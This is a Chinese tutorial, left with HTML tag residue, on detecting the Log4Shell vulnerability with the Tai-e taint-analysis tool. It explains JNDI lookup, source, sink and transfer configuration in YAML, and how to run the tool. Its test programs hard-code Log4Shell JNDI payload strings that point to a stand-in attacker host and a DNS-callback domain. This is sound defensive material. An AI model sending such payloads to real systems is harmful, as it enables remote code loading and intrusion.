太阿静态分析检测Log4Shell漏洞教学文档<\/h1>

0x01 Tai-e污点分析方案<\/h2>

Java污点分析的两大难点<\/h3>

别名关系<\/strong>：处理对象引用间的别名问题<\/li>

动态反射<\/strong>：处理Java反射机制带来的分析困难<\/li> <\/ol>
Tai-e解决方案<\/h3>

基于指针分析的架构<\/strong>：<\/p>

将污点转换成对象<\/li>
利用指针分析传播污点数据，自然解决别名关系问题<\/li> <\/ul> <\/li>

先进的反射分析<\/strong>：<\/p>

采用2019年提出的、目前推导能力最强的静态反射分析技术<\/li> <\/ul> <\/li> <\/ol>
0x02 Log4Shell漏洞原理<\/h2>
2a Lookup机制<\/h3>

日志方法：logger.error(str)<\/code><\/li>
将${...}<\/code>中的特定字符串映射到相应值<\/li>
示例： logger.error("${java:version}")<\/code> → "Java version 1.8.0_292"<\/li> logger.error("${java:os}")<\/code> → "Windows 10 10.0, architecture: and64-64"<\/li> <\/ul> <\/li> <\/ul> 2b JNDI Lookup<\/h3> 格式：${jndi:...}<\/code><\/li> JNDI(Java Naming and Directory Interface)功能： Java平台的标准扩展<\/li> 通过名称绑定对象的概念<\/li> 提供"通过名称查找对象"的规范接口<\/li> 具体实现技术：RMI、DNS、Corba、Ldap等<\/li> <\/ul> <\/li> <\/ul> 2c JNDI & LDAP Lookup<\/h3> 格式：${jndi:ldap:...}<\/code><\/li> LDAP(Lightweight Directory Access Protocol)：用于网络上的分布式目录服务访问和管理<\/li> <\/ul> <\/li> 攻击流程： Log4j解析输入为远程地址并发起请求<\/li> 服务器响应请求<\/li> 恶意payload示例：${jndi:ldap:\/\/badman.io\/Exploit}<\/code><\/li> <\/ol> <\/li> <\/ul> 0x03 如何分析Log4Shell<\/h2> 3a 设置source和sink<\/h3> 漏洞类型<\/strong>：注入漏洞(Injection)<\/li> 分析方法<\/strong>：污点分析(Taint Analysis)<\/li> <\/ul> 测试程序示例<\/h4> import<\/span> org.apache.logging.log4j.LogManager;<\/span> <\/span><\/span>import<\/span> org.apache.logging.log4j.Logger;<\/span> <\/span><\/span> <\/span><\/span>public<\/span> class<\/span> Server<\/span> {<\/span> <\/span><\/span> public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> {<\/span> <\/span><\/span> Logger logger =<\/span> LogManager.<\/span>getLogger<\/span>(<\/span>Server.<\/span>class<\/span>);<\/span> <\/span><\/span> String input =<\/span> getInput();<\/span> <\/span><\/span> logger.<\/span>error<\/span>(<\/span>input);<\/span> <\/span><\/span> }<\/span> <\/span><\/span> <\/span><\/span> private<\/span> static<\/span> String getInput<\/span>()<\/span> {<\/span> <\/span><\/span> return<\/span> "${jndi:ldap:\/\/badman.io\/Exploit}"<\/span>;<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>Source配置<\/h4> 标记为用户输入<\/li> 污点数据来源于getInput()<\/code>方法<\/li> YAML配置： sources<\/span>: <\/span><\/span> - {kind: call, method<\/span>: "<Main: java.lang.String getInput()>"<\/span>, index<\/span>: result}<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ul> Sink配置<\/h4> 对应JNDI Lookup<\/li> 标记为InitialContext.lookup(String)<\/code><\/li> YAML配置： sinks<\/span>: <\/span><\/span> - {method<\/span>: "<javax.naming.InitialContext: java.lang.Object lookup(java.lang.String)>"<\/span>, index<\/span>: 0<\/span>} <\/span><\/span><\/code><\/pre><\/li> <\/ul> 分析挑战<\/h4> 跨越33层方法调用<\/li> 污点数据多次变换形态<\/li> 涉及多种反射API，可能导致数据流追踪中断<\/li> <\/ol> 3b 自创建测试项目<\/h3> Maven配置(pom.xml)<\/h4> <dependencies><\/span> <\/span><\/span> <dependency><\/span> <\/span><\/span> <groupId><\/span>org.apache.logging.log4j<\/groupId><\/span> <\/span><\/span> <artifactId><\/span>log4j-web<\/artifactId><\/span> <\/span><\/span> <version><\/span>2.14.0<\/version><\/span> <\/span><\/span> <\/dependency><\/span> <\/span><\/span><\/dependencies><\/span> <\/span><\/span><\/code><\/pre>测试类<\/h4> package<\/span> org.example;<\/span> <\/span><\/span> <\/span><\/span>import<\/span> org.apache.logging.log4j.*;<\/span> <\/span><\/span>import<\/span> java.lang.String.*;<\/span> <\/span><\/span> <\/span><\/span>public<\/span> class<\/span> Main<\/span> {<\/span> <\/span><\/span> public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> {<\/span> <\/span><\/span> Logger logger =<\/span> LogManager.<\/span>getLogger<\/span>();<\/span> <\/span><\/span> String poc =<\/span> getInput();<\/span> <\/span><\/span> logger.<\/span>error<\/span>(<\/span>poc);<\/span> <\/span><\/span> }<\/span> <\/span><\/span> <\/span><\/span> private<\/span> static<\/span> String getInput<\/span>(){<\/span> <\/span><\/span> return<\/span> "${jndi:ldap:\/\/9710ck.dnslog.cn}"<\/span>;<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>3c 配置Tai-e的三个步骤<\/h3> 配置Source和Sink<\/li> 配置污点转移<\/li> 配置反射分析<\/li> <\/ol> 0x04 Tai-e的污点分析配置<\/h2> 4a 基本概念<\/h3> 变量表示<\/h4> 调用点的变量<\/strong>：<\/p> 结果变量(result)：方法调用的结果<\/li> 基变量(base)：方法调用的接收器对象<\/li> 参数：调用点的参数，从0开始索引<\/li> <\/ul> <\/li> 方法的变量<\/strong>：<\/p> 通过方法的索引来指定参数<\/li> <\/ul> <\/li> <\/ol> 字段签名<\/h4> 格式：<CLASS_TYPE: FIELD_TYPE FIELD_NAME><\/code><\/li> 示例：<org.example.MyClass: java.lang.String info><\/code><\/li> <\/ul> 4b Source分类<\/h3> Call Sources<\/strong>：<\/p> 格式： - {kind: call, method: METHOD_SIGNATURE, index: INDEX, type<\/span>: TYPE}<\/span> <\/span><\/span><\/code><\/pre><\/li> 当调用METHOD_SIGNATURE<\/code>时，为调用点的变量创建TYPE<\/code>类型的污点对象<\/li> <\/ul> <\/li> Parameter Sources<\/strong>：<\/p> 格式： - {kind: param, method: METHOD_SIGNATURE, index: INDEX, type<\/span>: TYPE}<\/span> <\/span><\/span><\/code><\/pre><\/li> 用于入口方法等没有显式调用点的情况<\/li> <\/ul> <\/li> Field Sources<\/strong>：<\/p> 格式： - {kind: field, field: FIELD_SIGNATURE, type<\/span>: TYPE}<\/span> <\/span><\/span><\/code><\/pre><\/li> 当字段加载到变量时生成污点对象<\/li> <\/ul> <\/li> <\/ol> 4c Sink分类<\/h3> 格式： sinks<\/span>: <\/span><\/span> - {method: METHOD_SIGNATURE, index<\/span>: INDEX}<\/span> <\/span><\/span><\/code><\/pre><\/li> 示例： sinks<\/span>: <\/span><\/span> - {method<\/span>: "<java.io.File: java.io.File File(java.lang.String)"<\/span>, index<\/span>: 0<\/span>} <\/span><\/span><\/code><\/pre><\/li> <\/ul> 4d 污点转移<\/h3> 为什么需要污点转移<\/h4> 指针分析能处理的语句有限（New、Assign、Store、Load、Call）<\/li> 无法处理如StringBuilder.append(taint)<\/code>、StringBuilder.toString()<\/code>等方法调用语句<\/li> <\/ol> 污点转移示例<\/h4> String taint =<\/span> getSecret();<\/span> \/\/ source <\/span><\/span><\/span><\/span>StringBuilder sb =<\/span> new<\/span> StringBuilder();<\/span> <\/span><\/span>sb.<\/span>append<\/span>(<\/span>"abc"<\/span>);<\/span> <\/span><\/span>sb.<\/span>append<\/span>(<\/span>taint);<\/span> \/\/ taint转移到sb <\/span><\/span><\/span><\/span>sb.<\/span>append<\/span>(<\/span>"xyz"<\/span>);<\/span> <\/span><\/span>String s =<\/span> sb.<\/span>toString<\/span>();<\/span> \/\/ taint转移到s <\/span><\/span><\/span><\/span>leak(<\/span>s);<\/span> \/\/ sink <\/span><\/span><\/span><\/code><\/pre>YAML配置<\/h4> transfers<\/span>: <\/span><\/span> - {method<\/span>: "<java.lang.StringBuilder: java.lang.StringBuilder append(java.lang.String)>"<\/span>, from: 0, to<\/span>: base}<\/span> <\/span><\/span> - {method<\/span>: "<java.lang.StringBuilder: java.lang.String toString()>"<\/span>, from: base, to<\/span>: result}<\/span> <\/span><\/span><\/code><\/pre>污点转移概念<\/h4> 由方法调用base.foo(a0, a1, ..., an)<\/code>引起<\/li> 五种转移情况：污点从参数转移到结果<\/li> 污点从参数转移到base<\/li> 污点从base转移到结果<\/li> 污点从base转移到参数<\/li> 污点从参数转移到另一个参数<\/li> <\/ol> <\/li> <\/ul> 0x05 安装太阿并检测Log4Shell<\/h2> 5a 安装太阿<\/h3> 环境要求<\/h4> IntelliJ IDEA 2023.1+<\/li> Amazon Corretto version 17.0.8+<\/li> 下载java-benchmarks子模块<\/li> <\/ul> Tai-e主类配置项<\/h4> 程序选项<\/strong>：<\/p> 类路径(-cp\/--class-path)<\/li> 应用程序类路径(-acp\/--app-class-path)<\/li> 主类(-m\/--main-class)<\/li> 输入类(--input-classes)<\/li> Java版本(-java)<\/li> <\/ul> <\/li> 分析选项<\/strong>：<\/p> 提前构建IR(--pre-build-ir)<\/li> 分析范围(scope)：APP\/ALL\/Reachable<\/li> 自定义分析选项<\/li> <\/ul> <\/li> 其他选项<\/strong>：<\/p> 帮助(-h\/--help)<\/li> 世界缓存模式(-wc\/--world-cache-mode)<\/li> 指定输出目录(--output-dir)<\/li> <\/ul> <\/li> <\/ol> 命令行示例<\/h4> java -jar tai-e-all.jar -cp foo.jar -cp "my program\/dir\/"<\/span> -m baz.Main -java 8<\/span> -a "pta=cs:2-type;time-limit:60;"<\/span> <\/span><\/span><\/code><\/pre>5b 配置并检测<\/h3> 找到Main class：pascal.taie.Main<\/code><\/li> 配置运行参数：--options-file java-benchmarks\/log4j\/2.14.0\/options.yml<\/code><\/li> <\/ol> 运行结果<\/h4> 查看output\/tai-e.log<\/code><\/li> 示例输出： Detected 1 taint flow(s): TaintFlow{ <Server: void main(java.lang.String[])>[12@L8] temp$4 = invokestatic Server.getInput()\/result -> <org.apache.logging.log4j.core.net.JndiManager: java.lang.Object lookup(java.lang.String)>[1@L172] $r3 = invokeinterface $r2.lookup(name)\/0 } <\/code><\/pre> <\/li> <\/ul> 可视化污点流<\/h4> 安装Graphviz： brew install graphviz <\/span><\/span><\/code><\/pre><\/li> 转换.dot文件为svg： dot -Tsvg -o taint-flow-graph.svg taint-flow-graph.dot <\/span><\/span><\/code><\/pre><\/li> <\/ol> 总结<\/h2> 通过Tai-e静态分析工具，我们可以有效地检测Log4Shell漏洞。关键在于：<\/p> 正确配置source和sink<\/li> 处理污点转移问题<\/li> 理解指针分析和污点分析的关系<\/li> 合理配置Tai-e的运行参数<\/li> <\/ol> 这种方法不仅适用于Log4Shell，也可推广到其他Java注入漏洞的静态分析中。<\/p>